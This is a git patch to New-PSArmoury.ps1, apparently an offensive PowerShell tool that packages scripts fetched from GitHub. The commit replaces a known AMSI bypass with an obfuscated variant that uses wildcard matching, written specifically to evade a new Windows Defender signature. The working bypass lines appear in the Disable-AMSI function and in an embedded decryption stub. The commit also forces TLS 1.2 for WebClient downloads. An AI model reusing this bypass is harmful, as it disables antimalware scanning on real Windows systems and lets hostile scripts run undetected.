From 631e8de3989e1ebf4d4e3232c093522989d1094c Mon Sep 17 00:00:00 2001 From: Christoph Falta Date: Wed, 5 Sep 2018 14:58:05 +0200 Subject: [PATCH] Small changes regarding AMSI and Net.Webclient -) Windows Defender now detects the famous one-line-amsi-bypass by Matthew Graeber so I added a small modification to make it work again -) Fixed an issue with SSL/TLS negotiation mismatch when using the Net.Webclient to access Github. Will now always use Tls1.2. --- New-PSArmoury.ps1 | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/New-PSArmoury.ps1 b/New-PSArmoury.ps1 index 6564168..6e423e0 100644 --- a/New-PSArmoury.ps1 +++ b/New-PSArmoury.ps1 @@ -153,8 +153,8 @@ function Disable-AMSI { try { - #AMSI Bypass by Matthew Graeber - [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true) + #AMSI Bypass by Matthew Graeber - altered a bit because Windows Defender now has a signature for the original one + (([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*tils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true) } catch { @@ -185,8 +185,8 @@ $DecryptionStub=@" if(`$Password -and `$Salt) { -#AMSI Bypass by Matthew Graeber -[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue(`$null,`$true) +#AMSI Bypass by Matthew Graeber - altered a bit because Windows Defender now has a signature for the original one +(([Ref].Assembly.gettypes() | where {`$_.Name -like "Amsi*tils"}).GetFields("NonPublic,Static") | where {`$_.Name -like "amsiInit*ailed"}).SetValue(`$null,`$true) `$Index = 0 foreach(`$ef in `$EncryptedFunctions) @@ -456,6 +456,8 @@ if($ScriptRequirements) $global:GitHubCredentials = $null $global:UserAgent = "Anything" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + foreach($PSA in $PSArmouryConfig) { switch($PSA.Type)